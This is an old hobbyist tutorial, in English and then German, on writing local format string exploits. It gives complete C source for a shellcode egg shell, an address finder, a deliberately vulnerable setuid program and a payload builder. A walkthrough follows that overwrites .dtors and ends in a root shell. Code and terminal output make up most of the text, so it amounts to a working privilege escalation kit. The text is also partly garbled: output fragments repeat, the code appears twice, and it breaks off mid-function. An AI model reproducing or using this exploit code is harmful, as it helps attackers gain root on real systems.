|
How to write Format String Exploits, also a summary of the
texts in child-fair pieces of
http://community.core-sdi.com/~juliano/
by Delikon (ich@delikon.de/www.Delikon.de.vu/27.4.02)
Everyone of the following codes ist not from me, i have
rewrite them a little bit, to get them work with every local
Format String Bug.
Now i will show you every code, you can also download the
sourcecode from
www.delikon.de.vu
in the security section.
1.The Eggshell. This code is used to copy the shellcode
into the memory. It is from
"Format String Attack on alpha system", and a little bit
rewritten.
-----------------egg.c--------------------------
/*
* this shall set egg shell in our environment
* ./egg <size> <align>
* truefinder, seo@igrus.inha.ac.kr
*
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#define DEF_EGGSIZE 4096
#define DEF_ALIGN 5
char nop[] = { 0x90 };
static char shellcode[] =
"\x6a\x17\x58\x31\xdb\xcd\x80\x31"
"\xd2\x52\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x52\x53"
"\x89\xe1\x8d\x42\x0b\xcd\x80";
int
main( int argc, char *argv[] )
{
char *eggbuf, *buf_ptr;
int align, i, eggsize ;
align = DEF_ALIGN;
eggsize = DEF_EGGSIZE ;
if ( argc < 2 ) {
printf ("%s <align> <size>\n", argv[0] );
exit(0);
}
if ( argc > 1 )
align = DEF_ALIGN + atoi(argv[1]);
if ( argc > 2 )
eggsize = atoi(argv[2]) + DEF_ALIGN ;
if ( (eggbuf = malloc( eggsize )) == NULL ) {
printf ("error : malloc \n");
exit (-1);
}
/* set egg buf */
memset( eggbuf, (int)NULL , eggsize );
for ( i = 0; i < 250 ; i++ )
strcat ( eggbuf, nop );
strcat ( eggbuf, shellcode );
for ( i =0 ; i < align ; i++ )
strcat ( eggbuf, "A");
memcpy ( eggbuf, "S=", 2 );
putenv ( eggbuf );
system("/bin/sh");
}
--------------------------end
here----------------------------------------
2. With "find.c" you can find the location with the
shellcode in the stack(from GOOBLES
screen-exploit).
you can also find the address with,
a) gdb ./vuln
b) set args %s%s%s%s%s%s%s%s%s%s
c) run
d) gdb say vuln exit with an error
e) x/2000 $ebp
f) serch the memory location with the nops(0x90).
-------------------------find.c-----------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*Thanks to GOBBLES for the code*/
unsigned long get_sp(void)
{ __asm__ ("movl %esp, %eax");
}
int i=0;
char *pointer;
char *nops =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
main(){
fprintf(stderr, ". SUCHE!\n");
pointer = (char *)get_sp();
while((i = strncmp(pointer, nops, strlen(nops))) != 0)
pointer++;
if(i == 0) {
fprintf(stderr, "Shellcode ist bei ----> : 0x%lx\n",
pointer+1);
return;
}
else {
fprintf(stderr, "Sorry nimm GDB\n");
return;
}
}
--------------------------end
here------------------------------------------
3. This is the program with the Bug, i have it from "What
are format bugs ?"
by Christophe BLAESS Christophe GRENIERFrédéreric RAYNAL,
in my opinion the best tutorial.
--------------------------vuln.c------------------------------------------
/* vuln.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int helloWorld();
int accessForbidden();
int vuln(const char *format)
{
char buffer[128];
int (*ptrf)();
memset(buffer, 0, sizeof(buffer));
printf("helloWorld() = %p\n", helloWorld);
printf("accessForbidden() = %p\n\n", accessForbidden);
ptrf = helloWorld;
printf("before : ptrf() = %p (%p)\n", ptrf, &ptrf);
snprintf(buffer, sizeof buffer, format);
printf("buffer = [%s] (%d)\n", buffer, strlen(buffer));
printf("after : ptrf() = %p (%p)\n", ptrf, &ptrf);
return ptrf();
}
int main(int argc, char **argv) {
int i;
if (argc <= 1) {
fprintf(stderr, "Usage: %s <buffer>\n", argv[0]);
exit(-1);
}
for(i=0;i<argc;i++)
printf("%d %p\n",i,argv[i]);
exit(vuln(argv[1]));
}
int helloWorld()
{
printf("Welcome in \"helloWorld\"\n");
fflush(stdout);
return 0;
}
int accessForbidden()
{
printf("You shouldn't be here \"accesForbidden\"\n");
fflush(stdout);
return 0;
}
------------------------------end
here-------------------------------
4. the last one is the Formatstringbuilder "builder.c",
from "What are format bugs ?",too.
you can do this also manual.
-----------------------------builder.c------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
/**
The 4 bytes where we have to write are placed that way : HH
HH LL LL
The variables ending with "*h" refer to the high part of
the word (H)
The variables ending with "*l" refer to the low part of the
word (L)
*/
char* build(unsigned int addr, unsigned int value, unsigned
int where) {
unsigned int length = 128; //too lazy to evaluate the true
length ...
unsigned int valh;
unsigned int vall;
unsigned char b0 = (addr >> 24) & 0xff;
unsigned char b1 = (addr >> 16) & 0xff;
unsigned char b2 = (addr >> 8) & 0xff;
unsigned char b3 = (addr ) & 0xff;
char *buf;
/* detailing the value */
valh = (value >> 16) & 0xffff; //top
vall = value & 0xffff; //bottom
fprintf(stderr, "adr : %d (%x)\n", addr, addr);
fprintf(stderr, "val : %d (%x)\n", value, value);
fprintf(stderr, "valh: %d (%.4x)\n", valh, valh);
fprintf(stderr, "vall: %d (%.4x)\n", vall, vall);
/* buffer allocation */
if ( ! (buf = (char *)malloc(length*sizeof(char))) ) {
fprintf(stderr, "Can't allocate buffer (%d)\n", length);
exit(EXIT_FAILURE);
}
memset(buf, 0, length);
/* let's build */
if (valh < vall) {
snprintf(buf,
length,
"%c%c%c%c" /* high address */
"%c%c%c%c" /* low address */
"%%.%hdx" /* set the value for the first %hn */
"%%%d$hn" /* the %hn for the high part */
"%%.%hdx" /* set the value for the second %hn */
"%%%d$hn" /* the %hn for the low part */
,
b3+2, b2, b1, b0, /* high address */
b3, b2, b1, b0, /* low address */
valh-8, /* set the value for the first %hn */
where, /* the %hn for the high part */
vall-valh, /* set the value for the second %hn */
where+1 /* the %hn for the low part */
);
} else {
snprintf(buf,
length,
"%c%c%c%c" /* high address */
"%c%c%c%c" /* low address */
"%%.%hdx" /* set the value for the first %hn */
"%%%d$hn" /* the %hn for the high part */
"%%.%hdx" /* set the value for the second %hn */
"%%%d$hn" /* the %hn for the low part */
,
b3+2, b2, b1, b0, /* high address */
b3, b2, b1, b0, /* low address */
vall-8, /* set the value for the first %hn */
where+1, /* the %hn for the high part */
valh-vall, /* set the value for the second %hn */
where /* the %hn for the low part */
);
}
return buf;
}
int
main(int argc, char **argv) {
char *buf;
if (argc < 3)
return EXIT_FAILURE;
buf = build(strtoul(argv[1], NULL, 16), /* adresse */
strtoul(argv[2], NULL, 16), /* valeur */
atoi(argv[3])); /* offset */
fprintf(stderr, "[%s] (%d)\n", buf, strlen(buf));
printf("%s", buf);
return EXIT_SUCCESS;
}
------------------------------------end
here------------------------------------
Now we
get started.
(compile it with gcc -o vuln vuln.c, and the following
programms, too.)
set it setuid root with
chown root.root vuln
chmod 4775 vuln
exp@delikon:~/geht> ls -la
insgesamt 91
drwxr-xr-x 2 exp users 253 Apr 27 16:16 .
drwx------ 21 exp users 2240 Apr 27 16:32 ..
-rwxr-xr-x 1 exp users 15204 Apr 27 15:53 build
-rw-r--r-- 1 exp users 3804 Apr 26 19:25 build.c
-rw-r--r-- 1 exp users 36 Apr 26 19:26 chmod.txt
-rw-r--r-- 1 exp users 34 Apr 26 19:27 dtors.tct
-rwxr-xr-x 1 exp users 14756 Apr 27 15:42 egg
-rw-r--r-- 1 exp users 1377 Apr 26 19:25 egg.c
-rwxr-xr-x 1 exp users 14121 Apr 27 16:04 find
-rw-r--r-- 1 exp users 748 Apr 27
-rwsrwxr-x 1 root root 15028 Apr 27 15:54 vuln
-rw-r--r-- 1 exp users 1009 Apr 26 19:55 vuln.c
vuln is now setuid root.
2. start the eggshell (now the shell is in the stack).
exp@delikon:~/geht> ./egg 5 6000
sh-2.05$
you can use other viariables ,too. try it.
3. find the .dtors sektion from vuln (this is the memory
location , which we want to overwrite)
sh-2.05$ objdump -s -j .dtors vuln
vuln: file format elf32-i386
Contents of section .dtors:
8049a64 ffffffff 00000000 ........
sh-2.05$
the location is 0x8049a64+4=0x8049a68 (you must add 4
everytime!, please read "Overwriting the .dtors section.")
4. the 3 and last argument is the offset, every box has a
different offset.
i search it manual with,
sh-2.05$ ./vuln AAAA%6\$x
0 0xbffff690
1 0xbffff697
helloWorld() = 0x8048780
accessForbidden() = 0x80487c0
before : ptrf() = 0x8048780 (0xbffff3cc)
buffer = [AAAA4000b07e] (12)
after : ptrf() = 0x8048780 (0xbffff3cc)
Welcome in "helloWorld"
sh-2.05$ ./vuln AAAA%7\$x
0 0xbffff690
1 0xbffff697
helloWorld() = 0x8048780
accessForbidden() = 0x80487c0
before : ptrf() = 0x8048780 (0xbffff3cc)
buffer = [AAAA8048780] (11)
after : ptrf() = 0x8048780 (0xbffff3cc)
Welcome in "helloWorld"
sh-2.05$ ./vuln AAAA%8\$x
0 0xbffff690
1 0xbffff697
helloWorld() = 0x8048780
accessForbidden() = 0x80487c0
before : ptrf() = 0x8048780 (0xbffff3cc)
buffer = [AAAA41414141] (12) <--------- we find it!!!
because A is 41 in hex.
after : ptrf() = 0x8048780 (0xbffff3cc)
Welcome in "helloWorld"
you see the offset is 8
P.S maybe you must start at home with 1 not with 6 like me
5.now we need the location which we want write in 0x8049a68
,
this is the shellcode location.
sh-2.05$ ./find
. SUCHE!
Shellcode ist bei ----> : 0xbffffbae
6. we are ready ! we have your 3 argument "the
where(0x8049a68)" the "what(0xbffffbae)
and the "Offset(8)"
lets check the user vor the last time
sh-2.05$ whoami
exp
now we start the exploit
sh-2.05$ ./vuln `./build 0x8049a68 0xbffffbae 8`
adr : 134519400 (8049a68)
val : -1073742930 (bffffbae)
valh: 49151 (bfff)
vall: 64430 (fbae)
[jh%.49143x%8$hn%.15279x%9$hn] (34)
0 0xbffff676
1 0xbffff67d
helloWorld() = 0x8048780
accessForbidden() = 0x80487c0
before : ptrf() = 0x8048780 (0xbffff3bc)
buffer =
[jh00000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000]
(127)
after : ptrf() = 0x8048780 (0xbffff3bc)
Welcome in "helloWorld"
sh-2.05# whoami
root <--------------- now we are root!!!!!!
P.S.every argument of this tutorial is different, at every
pc! i you have questions mail me ich@delikon.de
or vist me www.delikon.de.vu
= 0x8048780 (0xbffff3bc)
buffer =
[jh00000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000]
(127)
after : ptrf() = 0x8048780 (0xbffff3bc)
Welcome in "helloWorld"
sh-2.05# whoami
root <--------------- Sieg des Menschen über die Maschine
P.S. bei euch sind alle Werte anders, es muss aber trozdem
gehen wenn nicht, mailt mir ich@delikon.de
oder besucht mich unter www.delikon.de.vu
Wie schreibt man Format String Exploits
Wie schreibt man Format String Exploits,
oder auch eine Zusammenfassung der Texte von
http://community.core-sdi.com/~juliano/ in kindgerechten
Happen.
von Delikon (ich@delikon.de/www.delikon.de.vu/27.4.02)
Jeder der folgenden Codes stammt nicht von mir, ich habe
sie nur ein wenig umgeschrieben damit sie bei diesem
Beispiel
und jeden beliebigen local Format String Bug funktionieren.
Ich werde nun alle Quellcodes ein mal vorstellen.
Auch unter www.delikon.de.vu in der Securitysection zum
downloaden.
1. Die Eggshell. Diese wird verwendet um den Shellcode in
den Speicher zu kopieren.Dieser Code ist von
"Format String Attack on alpha system" nur eben auf ix86
portiert, und mit den Shellcode von dem ptrace24.c exploit.
-----------------egg.c--------------------------
/*
* this shall set egg shell in our environment
* ./egg <size> <align>
* truefinder, seo@igrus.inha.ac.kr
*
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#define DEF_EGGSIZE 4096
#define DEF_ALIGN 5
char nop[] = { 0x90 };
static char shellcode[] =
"\x6a\x17\x58\x31\xdb\xcd\x80\x31"
"\xd2\x52\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x52\x53"
"\x89\xe1\x8d\x42\x0b\xcd\x80";
int
main( int argc, char *argv[] )
{
char *eggbuf, *buf_ptr;
int align, i, eggsize ;
align = DEF_ALIGN;
eggsize = DEF_EGGSIZE ;
if ( argc < 2 ) {
printf ("%s <align> <size>\n", argv[0] );
exit(0);
}
if ( argc > 1 )
align = DEF_ALIGN + atoi(argv[1]);
if ( argc > 2 )
eggsize = atoi(argv[2]) + DEF_ALIGN ;
if ( (eggbuf = malloc( eggsize )) == NULL ) {
printf ("error : malloc \n");
exit (-1);
}
/* set egg buf */
memset( eggbuf, (int)NULL , eggsize );
for ( i = 0; i < 250 ; i++ )
strcat ( eggbuf, nop );
strcat ( eggbuf, shellcode );
for ( i =0 ; i < align ; i++ )
strcat ( eggbuf, "A");
memcpy ( eggbuf, "S=", 2 );
putenv ( eggbuf );
system("/bin/sh");
}
--------------------------end
here----------------------------------------
2. "find.c" mit dem Code findest du die Speicheraddresse im
Stack, von GOBBLES screen exploit.
Man findet die Addresse aber auch hier mit ,
a) gdb ./vuln
b) set args %s%s%s%s%s%s%s%s%s%s
c) run
d) gdb sagt das das Proggy abgestürzt ist
e) x/2000 $ebp
f) such eine von den Stellen mit den nops
-------------------------find.c-----------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*Thanks to GOBBLES for the code*/
unsigned long get_sp(void)
{ __asm__ ("movl %esp, %eax");
}
int i=0;
char *pointer;
char *nops =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
main(){
fprintf(stderr, ". SUCHE!\n");
pointer = (char *)get_sp();
while((i = strncmp(pointer, nops, strlen(nops))) != 0)
pointer++;
if(i == 0) {
fprintf(stderr, "Shellcode ist bei ----> : 0x%lx\n",
pointer+1);
return;
}
else {
fprintf(stderr, "Sorry nimm GDB\n");
return;
}
}
--------------------------end
here------------------------------------------
3. Das Programm mit dem Bug, habe ich von "What are format
bugs ?"
von Christophe BLAESS Christophe GRENIERFrédéreric RAYNAL,
meiner Meinung nach das beste Tutorial
--------------------------vuln.c------------------------------------------
/* vuln.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int helloWorld();
int accessForbidden();
int vuln(const char *format)
{
char buffer[128];
int (*ptrf)();
memset(buffer, 0, sizeof(buffer));
printf("helloWorld() = %p\n", helloWorld);
printf("accessForbidden() = %p\n\n", accessForbidden);
ptrf = helloWorld;
printf("before : ptrf() = %p (%p)\n", ptrf, &ptrf);
snprintf(buffer, sizeof buffer, format);
printf("buffer = [%s] (%d)\n", buffer, strlen(buffer));
printf("after : ptrf() = %p (%p)\n", ptrf, &ptrf);
return ptrf();
}
int main(int argc, char **argv) {
int i;
if (argc <= 1) {
fprintf(stderr, "Usage: %s <buffer>\n", argv[0]);
exit(-1);
}
for(i=0;i<argc;i++)
printf("%d %p\n",i,argv[i]);
exit(vuln(argv[1]));
}
int helloWorld()
{
printf("Welcome in \"helloWorld\"\n");
fflush(stdout);
return 0;
}
int accessForbidden()
{
printf("You shouldn't be here \"accesForbidden\"\n");
fflush(stdout);
return 0;
}
------------------------------end
here-------------------------------
4. und als letztes der Formatstringbuilder "builder.c",
auch von "What are format bugs ?"
geht aber auch alles per Hand :=), ist aber dann nicht meht
kindgerecht ;).
-----------------------------builder.c------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
/**
The 4 bytes where we have to write are placed that way : HH
HH LL LL
The variables ending with "*h" refer to the high part of
the word (H)
The variables ending with "*l" refer to the low part of the
word (L)
*/
char* build(unsigned int addr, unsigned int value, unsigned
int where) {
unsigned int length = 128; //too lazy to evaluate the true
length ...
unsigned int valh;
unsigned int vall;
unsigned char b0 = (addr >> 24) & 0xff;
unsigned char b1 = (addr >> 16) & 0xff;
unsigned char b2 = (addr >> 8) & 0xff;
unsigned char b3 = (addr ) & 0xff;
char *buf;
/* detailing the value */
valh = (value >> 16) & 0xffff; //top
vall = value & 0xffff; //bottom
fprintf(stderr, "adr : %d (%x)\n", addr, addr);
fprintf(stderr, "val : %d (%x)\n", value, value);
fprintf(stderr, "valh: %d (%.4x)\n", valh, valh);
fprintf(stderr, "vall: %d (%.4x)\n", vall, vall);
/* buffer allocation */
if ( ! (buf = (char *)malloc(length*sizeof(char))) ) {
fprintf(stderr, "Can't allocate buffer (%d)\n", length);
exit(EXIT_FAILURE);
}
memset(buf, 0, length);
/* let's build */
if (valh < vall) {
snprintf(buf,
length,
"%c%c%c%c" /* high address */
"%c%c%c%c" /* low address */
"%%.%hdx" /* set the value for the first %hn */
"%%%d$hn" /* the %hn for the high part */
|